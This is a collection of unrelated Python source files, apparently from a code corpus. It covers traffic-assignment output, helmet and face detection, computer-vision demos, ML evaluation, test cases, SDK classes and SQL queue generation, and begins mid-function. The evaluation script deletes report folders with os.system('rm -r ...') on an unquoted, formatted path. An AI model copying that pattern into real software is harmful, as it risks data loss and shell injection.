continue
cv = A.get_column_vec(at, dp, oz_id, dz_id)
node_path = None
try:
                # the `if x` filter is only needed for columns generated by
                # DTALite, whose trailing ';' leaves an empty string after split
node_path = [int(x) for x in node_seq.split(';') if x]
except ValueError:
raise Exception(
f'INVALID NODE PATH found for agent id: {agent_id}'
)
node_sum = sum(node_path)
if node_sum not in cv.path_node_seq_map.keys():
path_seq_no = cv.get_column_num()
col = Column(path_seq_no)
try:
col.nodes = [A.get_node_no(x) for x in node_path]
except IndexError:
raise Exception(
'Invalid node found on column!!'
'Did you use agent.csv from a different network?'
)
try:
                    # the `if x` filter is only needed for columns generated by
                    # DTALite, whose trailing ';' leaves an empty string after split
col.links = [
A.get_link_seq_no(x) for x in link_seq.split(';') if x
]
except IndexError:
raise Exception(
'INVALID link found on column!!'
'Did you use agent.csv from a different network?'
)
except ValueError:
raise Exception(
f'INVALID LINK PATH found for agent id: {agent_id}'
)
# the following four are non-critical info
col.set_toll(toll)
col.set_travel_time(tt)
col.set_geometry(geo)
                if dist == 0:
                    # derive distance from link lengths when it was not provided
                    dist = sum(A.get_link(x).get_length() for x in col.links)
                col.set_distance(dist)
cv.add_new_column(node_sum, col)
cv.get_column(node_sum).increase_volume(vol)
update_links_using_columns(ui)
def output_columns(ui, output_geometry=True, output_dir='.'):
with open(output_dir+'/agent.csv', 'w', newline='') as fp:
base = ui._base_assignment
nodes = base.get_nodes()
links = base.get_links()
column_pool = base.get_column_pool()
writer = csv.writer(fp)
line = ['agent_id',
'o_zone_id',
'd_zone_id',
'path_id',
'agent_type',
'demand_period',
'volume',
'toll',
'travel_time',
'distance',
'node_sequence',
'link_sequence',
'geometry']
writer.writerow(line)
path_sep = ';'
i = 0
for k, cv in column_pool.items():
if cv.get_od_volume() <= 0:
continue
# k = (at_id, dp_id, oz_id, dz_id)
at_id = k[0]
dp_id = k[1]
oz_id = k[2]
dz_id = k[3]
at_str = base.get_agent_type_str(at_id)
dp_str = base.get_demand_period_str(dp_id)
for col in cv.get_columns().values():
i += 1
node_seq = path_sep.join(
str(nodes[x].get_node_id()) for x in reversed(col.nodes)
)
link_seq = path_sep.join(
str(links[x].get_link_id()) for x in reversed(col.links)
)
geometry = ''
if output_geometry:
geometry = ', '.join(
nodes[x].get_coordinate() for x in reversed(col.nodes)
)
geometry = 'LINESTRING (' + geometry + ')'
line = [i,
oz_id,
dz_id,
col.get_seq_no(),
at_str,
dp_str,
col.get_volume(),
col.get_toll(),
col.get_travel_time(),
col.get_distance(),
node_seq,
link_seq,
geometry]
writer.writerow(line)
if output_dir == '.':
print('\ncheck agent.csv in '
+os.getcwd()+' for path finding results')
else:
print('\ncheck agent.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for path finding results')
def output_link_performance(ui, output_dir='.'):
with open(output_dir+'/link_performance.csv', 'w', newline='') as fp:
base = ui._base_assignment
links = base.get_links()
writer = csv.writer(fp)
line = ['link_id',
'from_node_id',
'to_node_id',
'time_period',
'volume',
'travel_time',
'speed',
'VOC',
'queue',
'density',
'geometry',
'notes']
writer.writerow(line)
for link in links:
for dp in base.get_demand_periods():
avg_travel_time = link.get_period_avg_travel_time(dp.get_id())
speed = link.get_length() / (max(SMALL_DIVISOR, avg_travel_time) / 60)
line = [link.get_link_id(),
link.get_from_node_id(),
link.get_to_node_id(),
dp.get_period(),
link.get_period_flow_vol(dp.get_id()),
avg_travel_time,
speed,
link.get_period_voc(dp.get_id()),
'',
'',
link.get_geometry(),
'']
writer.writerow(line)
if output_dir == '.':
print('\ncheck link_performance.csv in '
+os.getcwd()+' for link performance')
else:
print('\ncheck link_performance.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for link performance')
def output_agent_paths(ui, output_geometry=True, output_dir='.'):
with open(output_dir+'/agent_paths.csv', 'w', newline='') as f:
writer = csv.writer(f)
line = ['agent_id',
'o_zone_id',
'd_zone_id',
'path_id',
'agent_type',
'demand_period',
'volume',
'toll',
'travel_time',
'distance',
'node_sequence',
'link_sequence',
'geometry']
writer.writerow(line)
base = ui._base_assignment
nodes = base.get_nodes()
agents = base.get_agents()
agents.sort(key=lambda agent: agent.get_orig_node_id())
pre_dest_node_id = -1
for a in agents:
if not a.get_node_path():
continue
if a.get_dest_node_id() == pre_dest_node_id:
continue
pre_dest_node_id = a.get_dest_node_id()
agent_id = a.get_id()
geometry = ''
if output_geometry:
geometry = ', '.join(
nodes[x].get_coordinate() for x in reversed(a.get_node_path())
)
geometry = 'LINESTRING (' + geometry + ')'
line = [agent_id,
a.get_orig_zone_id(),
a.get_dest_zone_id(),
0,
'N/A',
'N/A',
'N/A',
'N/A',
'N/A',
a.get_path_cost(),
base.get_agent_node_path(agent_id, True),
base.get_agent_link_path(agent_id, True),
geometry]
writer.writerow(line)
if output_dir == '.':
print('\ncheck agent_paths.csv in '
+os.getcwd()+' for unique agent paths')
else:
print('\ncheck agent_paths.csv in '
+os.path.join(os.getcwd(), output_dir)
+' for unique agent paths')
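# Typical end-to-end use of the helpers above (a minimal sketch; assumes
# GMNS-style node.csv / link.csv / demand.csv / settings.yml under the given
# directory, e.g. one of the sample data sets):
#   download_sample_data_sets()
#   ui = read_network(load_demand=True, input_dir='data/Sioux_Falls')
#   output_columns(ui)
#   output_link_performance(ui)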
|
66013
|
from PIL import Image
from tflite_runtime.interpreter import Interpreter
from tflite_runtime.interpreter import load_delegate
from video import create_capture
import numpy as np
import cv2 as cv
import io
import picamera
import simpleaudio as sa
# load the TFLite model and label file
def load_labels(path):
with open(path, 'r') as f:
return {i: line.strip() for i, line in enumerate(f.readlines())}
def set_input_tensor(interpreter, image):
tensor_index = interpreter.get_input_details()[0]['index']
input_tensor = interpreter.tensor(tensor_index)()[0]
input_tensor[:, :] = image
# check whether the user is wearing a helmet
def classify_image(interpreter, image, top_k=1):
set_input_tensor(interpreter, image)
interpreter.invoke()
output_details = interpreter.get_output_details()[0]
output = np.squeeze(interpreter.get_tensor(output_details['index']))
# If the model is quantized (uint8 data), then dequantize the results
if output_details['dtype'] == np.uint8:
scale, zero_point = output_details['quantization']
output = scale * (output - zero_point)
ordered = np.argpartition(-output, top_k)
    # if the score is above 0.90, regard the user as wearing a helmet
if (top_k==1) and (output[1] > 0.9):
res = 1
else:
res = 0
return res
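# Illustrative note (assumed quantization values): for a uint8 model with
# scale = 1/256 and zero_point = 0, a raw output of 240 dequantizes to
# 240/256 = 0.9375, which passes the 0.9 helmet threshold used above.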
# detect human faces with a Haar cascade
def detect(img, cascade):
rects = cascade.detectMultiScale(img, scaleFactor=1.3, minNeighbors=4, minSize=(30, 30), flags=cv.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
rects[:,2:] += rects[:,:2]
return rects
def main():
import sys, getopt
checknum = 0
while True:
try:
# face recognizing code
print('face camera ')
args, video_src = getopt.getopt(sys.argv[1:2], '', ['cascade=', 'nested-cascade='])
try:
video_src = video_src[0]
            except IndexError:
video_src = 0
args = dict(args)
cascade_fn = args.get('--cascade', "data/haarcascades/haarcascade_frontalface_alt.xml")
nested_fn = args.get('--nested-cascade', "data/haarcascades/haarcascade_eye.xml")
cascade = cv.CascadeClassifier(cv.samples.findFile(cascade_fn))
nested = cv.CascadeClassifier(cv.samples.findFile(nested_fn))
cam = create_capture(video_src, fallback='synth:bg={}:noise=0.05'.format(cv.samples.findFile('samples/data/lena.jpg')))
while True:
ret, img = cam.read()
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
gray = cv.equalizeHist(gray)
rects = detect(gray, cascade)
vis = img.copy()
if len(rects):
if not nested.empty():
                        print('into nested')  # when a person has entered the frame
for x1, y1, x2, y2 in rects:
roi = gray[y1:y2, x1:x2]
vis_roi = vis[y1:y2, x1:x2]
print('findrects')
subrects = detect(roi.copy(), nested)
                            if len(subrects) > 0:
faceok = 'faceok.wav'
fa = sa.WaveObject.from_wave_file(faceok)
face = fa.play()
face.wait_done()
print('detect!!')
break
cam.release() # face recognition camera off
print("helmet camera")
            # helmet detecting code
filename = 'helmet.wav'
wave_obj = sa.WaveObject.from_wave_file(filename)
helmetok = 'helmetok.wav'
wave = sa.WaveObject.from_wave_file(helmetok)
labels = "labels.txt"
model = "model_edgetpu.tflite"
interpreter = Interpreter(model, experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
interpreter.allocate_tensors()
_, height, width, _ = interpreter.get_input_details()[0]['shape']
# helmet detect camera on
with picamera.PiCamera(resolution=(640, 480), framerate=30) as camera:
camera.start_preview()
try:
stream = io.BytesIO()
for _ in camera.capture_continuous(stream, format='jpeg', use_video_port=True):
stream.seek(0)
image = Image.open(stream).convert('RGB').resize((width, height),Image.ANTIALIAS)
results = classify_image(interpreter, image)
print("result:")
print(results)
stream.seek(0)
stream.truncate()
                        # determine whether the user is wearing a helmet
if results==0:
play_obj = wave_obj.play()
play_obj.wait_done()
checknum += 1
if checknum==3:
checknum = 0
                                break
else:
helm = wave.play()
helm.wait_done()
print('GoodBoy')
break
finally:
camera.stop_preview()
except KeyboardInterrupt:
break
if __name__ == '__main__':
main()
cv.destroyAllWindows()
|
66034
|
import re
def parseDeviceId(id):
match = re.search('(#|\\\\)vid_([a-f0-9]{4})&pid_([a-f0-9]{4})(&|#|\\\\)', id, re.IGNORECASE)
return [int(match.group(i), 16) if match else None for i in [2, 3]]
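# Example (hypothetical Windows device instance ID):
#   parseDeviceId(r'USB\VID_046D&PID_C077\5&2D94C1E&0&2')
#   -> [1133, 49271]  # i.e. (0x046d, 0xc077)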
|
66043
|
import cv2
import numpy as np
# Capture the input frame
def get_frame(cap, scaling_factor=0.5):
ret, frame = cap.read()
# Resize the frame
frame = cv2.resize(frame, None, fx=scaling_factor,
fy=scaling_factor, interpolation=cv2.INTER_AREA)
return frame
if __name__=='__main__':
# Initialize the video capture object
cap = cv2.VideoCapture(1)
# Create the background subtractor object
bgSubtractor = cv2.createBackgroundSubtractorMOG2()
# This factor controls the learning rate of the algorithm.
# The learning rate refers to the rate at which your model
# will learn about the background. Higher value for
# 'history' indicates a slower learning rate. You
# can play with this parameter to see how it affects
# the output.
history = 100
# Iterate until the user presses the ESC key
while True:
frame = get_frame(cap, 0.5)
# Apply the background subtraction model to the input frame
mask = bgSubtractor.apply(frame, learningRate=1.0/history)
        # Convert the mask from grayscale to 3-channel BGR so it can be ANDed with the color frame
mask = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
cv2.imshow('Input frame', frame)
cv2.imshow('Moving Objects MOG', mask & frame)
# Check if the user pressed the ESC key
c = cv2.waitKey(delay=30)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
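# Alternative sketch: the history length can also be passed to the
# constructor, letting OpenCV manage the learning rate automatically:
#   bgSubtractor = cv2.createBackgroundSubtractorMOG2(history=100)
#   mask = bgSubtractor.apply(frame)  # learningRate defaults to -1 (auto)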
|
66047
|
from . import core, mixin
class Datum(mixin.Parameters, mixin.NetCDFVariable, core.Datum):
"""A datum component of a CF data model coordinate reference.
A datum is a complete or partial definition of the zeroes of the
dimension and auxiliary coordinate constructs which define a
coordinate system.
The datum may contain the definition of a geophysical surface
which corresponds to the zero of a vertical coordinate construct,
and this may be required for both horizontal and vertical
coordinate systems.
Elements of the datum not specified may be implied by the
properties of the dimension and auxiliary coordinate constructs
referenced by the `CoordinateReference` instance that contains the
datum.
**NetCDF interface**
{{netCDF variable}}
.. versionadded:: (cfdm) 1.7.0
"""
def __init__(self, parameters=None, source=None, copy=True):
"""**Initialisation**
:Parameters:
parameters: `dict`, optional
Set parameters. The dictionary keys are parameter
names, with corresponding values. Ignored if the
*source* parameter is set.
Parameters may also be set after initialisation with
the `set_parameters` and `set_parameter` methods.
*Parameter example:*
``parameters={'earth_radius': 6371007.}``
source: optional
Initialise the parameters from those of *source*.
{{init source}}
{{init copy: `bool`, optional}}
"""
super().__init__(parameters=parameters, source=source, copy=copy)
self._initialise_netcdf(source)
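# Minimal usage sketch (the parameter value comes from the docstring example;
# the second parameter name is hypothetical):
#   d = Datum(parameters={'earth_radius': 6371007.})
#   d.set_parameter('geographic_crs_name', 'WGS 84')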
|
66116
|
from models.rnn_mlp import RNN_MLP
from models.social_attention import SocialAttention
from models.cnn_mlp import CNN_MLP
from models.spatial_attention import SpatialAttention
from models.s2s_spatial_attention import S2sSpatialAtt
from models.s2s_social_attention import S2sSocialAtt
import time
import json
import torch
import sys
import helpers.helpers_training as helpers
import helpers.helpers_evaluation as helpers_evaluation
import torch.nn as nn
import numpy as np
import os
def main():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
torch.manual_seed(42)
#loading parameters
parameters_path = "./src/parameters/project.json"
parameters_project = json.load(open(parameters_path))
data_processed_parameters = json.load(open(parameters_project["data_processed_parameters"]))
evaluation_parameters = json.load(open(parameters_project["evaluation_parameters"]))
processed_parameters = json.load(open(parameters_project["data_processed_parameters"]))
# loading training data
data_file = parameters_project["hdf5_samples"]
# scene lists for train, eval and test
eval_scenes = data_processed_parameters["eval_scenes"]
train_eval_scenes = data_processed_parameters["train_scenes"]
test_scenes = data_processed_parameters["test_scenes"]
train_scenes = [scene for scene in train_eval_scenes if scene not in eval_scenes]
scenes = [train_eval_scenes,train_scenes,test_scenes,eval_scenes]
report_name = evaluation_parameters["report_name"]
model_name = evaluation_parameters["model_name"]
models_path = parameters_project["models_evaluation"] + "{}.tar".format(model_name)
print("loading trained model {}".format(model_name))
net = None
if model_name == "baseline":
args_net = {
"offsets":0,
"offsets_input":0,
"use_images":0
}
else:
checkpoint = torch.load(models_path)
args_net = checkpoint["args"]
model = args_net["model_name"]
net = None
if model == "rnn_mlp":
net = RNN_MLP(args_net)
elif model == "cnn_mlp":
net = CNN_MLP(args_net)
elif model == "social_attention":
net = SocialAttention(args_net)
elif model == "spatial_attention":
net = SpatialAttention(args_net)
elif model == "s2s_social_attention":
            net = S2sSocialAtt(args_net)
elif model == "s2s_spatial_attention":
net = S2sSpatialAtt(args_net)
# loading trained network
net.load_state_dict(checkpoint['state_dict'])
net = net.to(device)
net.eval()
scenes = test_scenes
set_type_test = evaluation_parameters["set_type_test"]
if set_type_test == "train":
scenes = train_scenes
elif set_type_test == "eval":
scenes = eval_scenes
elif set_type_test == "train_eval":
scenes = train_eval_scenes
times = 0 # sum time for every prediction
nb_samples = 0 # number of predictions
dir_name = parameters_project["evaluation_reports"] + "{}/".format(report_name)
sub_dir_name = parameters_project["evaluation_reports"] + "{}/scene_reports/".format(report_name)
if os.path.exists(dir_name):
os.system("rm -r {}".format(dir_name))
os.system("mkdir {}".format(dir_name))
if os.path.exists(sub_dir_name):
os.system("rm -r {}".format(sub_dir_name))
os.system("mkdir {}".format(sub_dir_name))
s = time.time()
for z,scene in enumerate(scenes):
sample_id = 0
print(scene)
scene_dict = {} # save every sample in the scene
# get dataloader
data_loader = helpers_evaluation.get_data_loader(parameters_project,data_file,scene,args_net,processed_parameters,evaluation_parameters)
sample_id = 0
print(time.time()-s)
for batch_idx, data in enumerate(data_loader):
inputs, labels,types,points_mask, active_mask,imgs,target_last,input_last = data
inputs = inputs.to(device)
labels = labels.to(device)
imgs = imgs.to(device)
b,n,_,_ = inputs.shape
if not args_net["offsets_input"]:
input_last = np.zeros_like(inputs.cpu().numpy())
outputs = labels
if model_name != "baseline":
# active mask for training, along batch*numbr_agent axis
active_mask = active_mask.to(device)
points_mask = list(points_mask)
# if not args_net["offsets_input"]:
# input_last = np.zeros_like(inputs.cpu().numpy())
start = time.time()
if not args_net["use_neighbors"]:
outputs,inputs,types,active_mask,points_mask = helpers_evaluation.predict_naive(inputs,types,active_mask,points_mask,net,device,imgs)
else:
if not args_net["joint_optimisation"]:
outputs,inputs,types,active_mask,points_mask = helpers_evaluation.predict_neighbors_disjoint(inputs,types,active_mask,points_mask,net,device)
else:
outputs = net((inputs,types,active_mask,points_mask,imgs))
end = time.time() - start
times += end
nb_samples += b*n
active_mask = helpers_evaluation.get_active_mask(points_mask[1])
points_mask = torch.FloatTensor(points_mask[1]).to(device)
outputs = torch.mul(points_mask,outputs)
            labels = torch.mul(points_mask, labels)  # right place for this?
# active mask per sample in batch
if not args_net["offsets"]:
target_last = np.zeros_like(labels.detach().cpu().numpy())
for i,l,o,t,p, a, il, tl in zip(inputs, labels, outputs, types, points_mask,active_mask, input_last, target_last):
i = i[a].detach().cpu().numpy()
l = l[a].detach().cpu().numpy()
t = t[a]
p = p[a]
o = o[a].detach().cpu().numpy()
tl = tl[a]
il = il[a]
# revert offsets
i,l,o = helpers.offsets_to_trajectories( i,l,o,args_net["offsets"],args_net["offsets_input"],tl,il)
# apply active mask
scene_dict[sample_id] = {}
scene_dict[sample_id]["inputs"] = i.tolist()
scene_dict[sample_id]["labels"] = l.tolist()
scene_dict[sample_id]["outputs"] = o.tolist()
# scene_dict[sample_id]["active_mask"] = a.cpu().numpy().tolist()
scene_dict[sample_id]["types"] = t.tolist()
scene_dict[sample_id]["points_mask"] = p.cpu().numpy().tolist()
sample_id += 1
        json.dump(scene_dict, open(sub_dir_name + "{}_samples.json".format(scene), "w"), indent=0)
timer = {
"total_time":times,
"nb_trajectories":nb_samples,
"time_per_trajectory":times/nb_samples
}
# save the time
    json.dump(timer, open(dir_name + "time.json", "w"), indent=0)
if __name__ == "__main__":
main()
|
66137
|
import unittest
import numpy as np
from sklearn import exceptions
# from sklearn.datasets import load_boston as load
from skcosmo.datasets import load_csd_1000r as load
from skcosmo.feature_selection import CUR
class TestCUR(unittest.TestCase):
def setUp(self):
self.X, _ = load(return_X_y=True)
def test_bad_transform(self):
selector = CUR(n_to_select=2)
with self.assertRaises(exceptions.NotFittedError):
_ = selector.transform(self.X)
def test_restart(self):
"""
This test checks that the model can be restarted with a new instance
"""
ref_selector = CUR(n_to_select=self.X.shape[-1] - 3).fit(X=self.X)
ref_idx = ref_selector.selected_idx_
selector = CUR(n_to_select=1)
selector.fit(self.X)
for i in range(self.X.shape[-1] - 3):
selector.n_to_select += 1
selector.fit(self.X, warm_start=True)
self.assertEqual(selector.selected_idx_[i], ref_idx[i])
def test_non_it(self):
"""
This test checks that the model can be run non-iteratively
"""
C = self.X.T @ self.X
_, UC = np.linalg.eigh(C)
ref_idx = np.argsort(-(UC[:, -1] ** 2.0))[:-1]
selector = CUR(n_to_select=self.X.shape[-1] - 1, iterative=False)
selector.fit(self.X)
self.assertTrue(np.allclose(selector.selected_idx_, ref_idx))
if __name__ == "__main__":
unittest.main(verbosity=2)
|
66204
|
import functools
def deny(blacklist):
"""
Decorates a handler to filter out a blacklist of commands.
The decorated handler will not be called if message.command is in the
blacklist:
@deny(['A', 'B'])
def handle_everything_except_a_and_b(client, message):
pass
Single-item blacklists may be passed as a string:
@deny('THIS')
def handle_everything_except_this(client, message):
pass
"""
blacklist = [blacklist] if isinstance(blacklist, str) else blacklist
    def inner_decorator(handler):
        @functools.wraps(handler)
        def wrapped(client, message):
            if message.command not in blacklist:
                handler(client=client, message=message)
        return wrapped
return inner_decorator
def allow(whitelist):
"""
Decorates a handler to filter all except a whitelist of commands
The decorated handler will only be called if message.command is in the
whitelist:
@allow(['A', 'B'])
def handle_only_a_and_b(client, message):
pass
Single-item whitelists may be passed as a string:
@allow('THIS')
def handle_only_this(client, message):
pass
"""
whitelist = [whitelist] if isinstance(whitelist, str) else whitelist
    def inner_decorator(handler):
        @functools.wraps(handler)
        def wrapped(client, message):
            if message.command in whitelist:
                handler(client=client, message=message)
        return wrapped
return inner_decorator
|
66225
|
import os
from shutil import copytree, copy2
from glob import glob
import torchvision
import torch
from tensorboardX import SummaryWriter
from sklearn import metrics
def copy_source_code(path):
if not os.path.isdir(path):
os.makedirs(path)
denylist = ["./__pycache__/"]
folders = glob(r'./*/')
# For copying python files
for file_ in glob(r'./*.py'):
copy2(file_, path)
# For copying json files
for file_ in glob(r'./*.json'):
copy2(file_, path)
for folder in folders:
if folder not in denylist:
# Remove first char which is . due to the glob
copytree(folder, path + folder[1:])
class LoggerUtils():
"""docstring for LoggerUtils"""
def __init__(self, config):
super(LoggerUtils, self).__init__()
log_path = config["log_path"]
tb_path = log_path + "/tensorboard"
        if not os.path.isdir(tb_path):
            # makedirs also creates a missing parent log_path, unlike mkdir
            os.makedirs(tb_path, exist_ok=True)
self.config = config
self.writer = SummaryWriter(tb_path)
def save_image_batch(self, batch_image, path):
torchvision.utils.save_image(batch_image, '{}/{}'.format(
self.config["log_path"], path), nrow=8, padding=2)
def save_model(self, model, path):
torch.save(model.state_dict(), path)
def log_model_stats(self, model):
pass
def log_console(self, message):
print(message)
def log_metrics(self, category, y_pred, y_true, iteration):
#self.log_scalar(category + "/metrics/roc_auc", metrics.roc_auc_score(y_true, y_pred), iteration)
#self.log_scalar(category + "/metrics/f1", metrics.f1_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/precision", metrics.precision_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/recall", metrics.recall_score(y_true, y_pred > 0.5), iteration)
#self.log_scalar(category + "/metrics/auprc", metrics.average_precision_score(y_true, y_pred), iteration)
pass
def log_scalar(self, category, value, iteration):
self.writer.add_scalar(category, value, iteration)
def log_histogram(self, category, vector, step):
self.writer.add_histogram(category, vector, step)
|
66242
|
from collections import (
defaultdict,
)
from contextlib import (
asynccontextmanager,
)
from datetime import (
datetime,
)
from typing import (
Iterable,
)
import psutil
from core.db_entities import (
DBTable,
DstDatabase,
)
from core.enums import (
TransferringStagesEnum,
)
from core.helpers import (
dates_list_to_str,
logger,
)
class StatisticManager:
def __init__(
self,
database: DstDatabase,
):
self._database = database
self._time_indications = defaultdict(list)
self._memory_usage_indications = defaultdict(list)
def set_indication_time(self, stage):
"""
Add stage indication time
Stage from TransferringStagesEnum
"""
self._time_indications[stage].append(datetime.now())
def set_indication_memory(self, stage):
"""
Add stage memory usage indication
"""
self._memory_usage_indications[stage].append(
dict(psutil.virtual_memory()._asdict())
)
def print_transferring_indications(self):
"""
Output transferring indications to log
"""
for stage in TransferringStagesEnum.values.keys():
if stage in self._time_indications:
logger.info(
f"{TransferringStagesEnum.values.get(stage)} --- "
f"{dates_list_to_str(self._time_indications[stage])}"
)
if stage in self._memory_usage_indications:
logger.info(
f"{TransferringStagesEnum.values.get(stage)} --- "
f"{self._memory_usage_indications[stage]}"
)
def print_records_transfer_statistic(self):
"""
Output transferred tables rows count
"""
tables: Iterable[DBTable] = self._database.tables.values()
tables_counts = {
table.name: (table.transferred_pks_count, len(table.need_transfer_pks))
for table in tables
}
sorted_tables_counts = (
sorted(tables_counts, key=lambda t_n: tables_counts[t_n][0])
)
for table_name in sorted_tables_counts:
logger.info(
f"{table_name} --- {tables_counts[table_name][0]} / "
f"{tables_counts[table_name][1]}"
)
@asynccontextmanager
async def statistic_indexer(
statistic_manager: StatisticManager,
stage: int,
):
"""
Statistic indexer context manager
"""
    statistic_manager.set_indication_time(stage)
    statistic_manager.set_indication_memory(stage)
    try:
        yield
    finally:
        # record the closing indications even if the wrapped block raises
        statistic_manager.set_indication_time(stage)
        statistic_manager.set_indication_memory(stage)
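# Usage sketch (SOME_STAGE is a hypothetical TransferringStagesEnum member;
# requires a running asyncio event loop):
#   async with statistic_indexer(manager, SOME_STAGE):
#       await transfer_table_batch()
# Time and memory indications are recorded both before and after the block.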
|
66255
|
from a10sdk.common.A10BaseClass import A10BaseClass
class DiskUsage(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param disk_usage: {"type": "string", "format": "string"}
:param time: {"type": "number", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "disk-usage"
self.DeviceProxy = ""
self.disk_usage = ""
self.time = ""
for keys, value in kwargs.items():
            setattr(self, keys, value)
class Oper(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param end_time: {"type": "number", "format": "number"}
:param start_time: {"type": "number", "format": "number"}
:param total_disk: {"type": "string", "format": "string"}
:param disk_usage: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"disk-usage": {"type": "string", "format": "string"}, "optional": true, "time": {"type": "number", "format": "number"}}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "oper"
self.DeviceProxy = ""
self.end_time = ""
self.start_time = ""
self.total_disk = ""
self.disk_usage = []
for keys, value in kwargs.items():
            setattr(self, keys, value)
class Disk(A10BaseClass):
"""Class Description::
Operational Status for the object disk.
Class disk supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/rrd/disk/oper`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
        self.required = []
self.b_key = "disk"
self.a10_url="/axapi/v3/rrd/disk/oper"
self.DeviceProxy = ""
self.oper = {}
for keys, value in kwargs.items():
            setattr(self, keys, value)
|
66259
|
import hashlib
import typing
from pg_sql import SqlId, SqlNumber, SqlObject, SqlString, sql_list
from .formats.join import JoinTable
from .join_common import Structure, context_column, foreign_column, local_column
from .join_key import KeyResolver
from .sql import SqlQuery, SqlTableExpr, table_fields, update_excluded
from .string import indent
def create_queue(
id: str,
table_id: str,
structure: Structure,
resolver: KeyResolver,
tables: typing.Dict[str, JoinTable],
context: typing.List[str],
):
table = tables[table_id]
dep = table.join
foreign_table = tables[dep]
if table.lock_id is not None:
lock_id = table.lock_id
else:
digest = hashlib.md5(f"{id}__{table_id}".encode("utf-8")).digest()
lock_id = int.from_bytes(digest[0:2], "big", signed=True)
lock_base = lock_id * (2 ** 48)
queue_table = structure.queue_table(table_id)
column_names = [column.name for column in table.key] if table.key else ["_"]
local_columns = [local_column(column) for column in column_names]
foreign_columns = [foreign_column(column) for column in table.join_key]
context_columns = [context_column(setting) for setting in context]
columns = (
[
f"{SqlObject(SqlId('l'), SqlId(column))} AS {local_column(column)}"
for column in column_names
]
+ [
f"{SqlObject(SqlId('f'), SqlId(column))} AS {foreign_column(column)}"
for column in table.join_key
]
+ [f"NULL::text AS {context_column(setting)}" for setting in context]
+ ["NULL::bigint AS seq", "NULL::bigint AS lock", "NULL::bigint AS count"]
)
yield f"""
CREATE TABLE {queue_table}
AS SELECT {sql_list(columns)}
FROM
{table.sql} AS l
CROSS JOIN {foreign_table.sql} AS f
WITH NO DATA
""".strip()
yield f"""
ALTER TABLE {queue_table}
ADD PRIMARY KEY ({sql_list(local_columns + context_columns)}),
ALTER count SET NOT NULL,
ALTER count SET DEFAULT 0,
ALTER lock ADD GENERATED BY DEFAULT AS IDENTITY,
ALTER lock SET NOT NULL,
ALTER seq ADD GENERATED BY DEFAULT AS IDENTITY,
ALTER seq SET NOT NULL
""".strip()
yield f"""
COMMENT ON TABLE {queue_table} IS {SqlString(f"Asynchronous processing of changes to {table.sql}")}
""".strip()
for column in column_names:
yield f"""
COMMENT ON COLUMN {queue_table}.{local_column(column)} IS {SqlString(f"{table.sql} key: {SqlId(column)}")}
"""
for column in table.join_key:
yield f"""
COMMENT ON COLUMN {queue_table}.{foreign_column(column)} IS {SqlString(f"{foreign_table.sql} iterator: {SqlId(column)}")}
"""
yield f"""
COMMENT ON COLUMN {queue_table}.seq IS 'Order to process'
""".strip()
yield f"""
COMMENT ON COLUMN {queue_table}.lock IS 'Lock ID (add to base value {lock_base})'
""".strip()
yield f"""
COMMENT ON COLUMN {queue_table}.count IS 'Count of records processed'
""".strip()
yield f"""
CREATE INDEX ON {queue_table} (seq)
""".strip()
foreign_key_table = SqlObject(SqlId("_foreign_key"))
item = SqlId("_item")
new_item = SqlId("_new_item")
new_fields = ["''" for _ in context] + ["0", "0", "_item.count + count(*) OVER ()"]
get_item = f"""
SELECT
{table_fields(item, local_columns)},
{table_fields(SqlId("k"), [SqlId(column) for column in table.join_key])},
{sql_list(new_fields)}
INTO _new_item
FROM {SqlObject(foreign_key_table)} AS k
ORDER BY {table_fields(SqlId("k"), table.join_key)} DESC
""".strip()
if table.join_on is not None:
join = f"""
JOIN (VALUES ({table_fields(item, local_columns)})) AS {SqlId(table_id)} ({sql_list(SqlId(col.name) for col in table.key)})
ON {table.join_on}
""".strip()
else:
join = ""
key1_query = f"""
SELECT {SqlId(dep)}.*
FROM {foreign_table.sql} AS {SqlId(dep)}
{join}
ORDER BY {sql_list(SqlObject(SqlId(dep), SqlId(name)) for name in table.join_key)}
LIMIT max_records
""".strip()
gather1 = resolver.sql(
foreign_key_table,
exprs=[SqlTableExpr(foreign_key_table, key1_query)],
last_expr=get_item,
)
key2_query = f"""
SELECT {SqlId(dep)}.*
FROM {foreign_table.sql} AS {SqlId(dep)}
{join}
WHERE ({table_fields(item, foreign_columns)}) < ({table_fields(SqlId(dep), (SqlId(column) for column in table.join_key))})
ORDER BY {sql_list(SqlObject(SqlId(dep), SqlId(name)) for name in table.join_key)}
LIMIT max_records
""".strip()
gather2 = resolver.sql(
foreign_key_table,
exprs=[SqlTableExpr(foreign_key_table, key2_query)],
last_expr=get_item,
)
context_vars = "\n".join(
f"{SqlId(f'_context_{setting}')} text := current_setting({SqlString(setting)}, true);"
for setting in context
)
set_context = "\n".join(
f"PERFORM set_config({SqlString(setting)}, _item.{context_column(setting)}, true);"
for setting in context
)
unset_context = "\n".join(
f"PERFORM set_config({SqlString(setting)}, {SqlId(f'_context_{setting}')}, true);"
for setting in context
)
process_function = structure.queue_process_function(table_id)
yield f"""
CREATE FUNCTION {process_function} (max_records bigint) RETURNS bool
LANGUAGE plpgsql AS $$
DECLARE
_item {queue_table};
_new_item {queue_table};
{context_vars}
BEGIN
-- find item
SELECT (q.*) INTO _item
